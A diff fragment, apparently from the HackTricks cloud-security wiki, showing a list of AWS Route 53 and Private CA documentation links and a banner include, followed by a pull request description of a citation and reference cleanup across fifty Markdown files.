+- [4] [CreateHostedZone - Amazon Route 53](https://docs.aws.amazon.com/Route53/latest/APIReference/API_CreateHostedZone.html)
+- [5] [Working with private hosted zones - Amazon Route 53](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/hosted-zones-private.html)
+- [6] [ChangeResourceRecordSets - Amazon Route 53](https://docs.aws.amazon.com/Route53/latest/APIReference/API_ChangeResourceRecordSets.html)
+- [7] [Actions, resources, and condition keys for AWS Private Certificate Authority](https://docs.aws.amazon.com/service-authorization/latest/reference/list_acm-pca.html)
+- [8] [AWS Private CA template definitions](https://docs.aws.amazon.com/privateca/latest/userguide/template-definitions.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-


### PR DESCRIPTION
Audits SUMMARY positions 301-350.

- normalizes numbered references and linked superscript citations
- keeps the training banner after the final References section
- removes duplicate/obsolete or technically invalid material found during review
- excludes hackingthe.cloud and third-party copied imagery

Validation: 50 changed Markdown files; citation/reference/banner/fence structural checks pass; git diff --check passes; reference URL audit passes; forbidden-source scan is clean.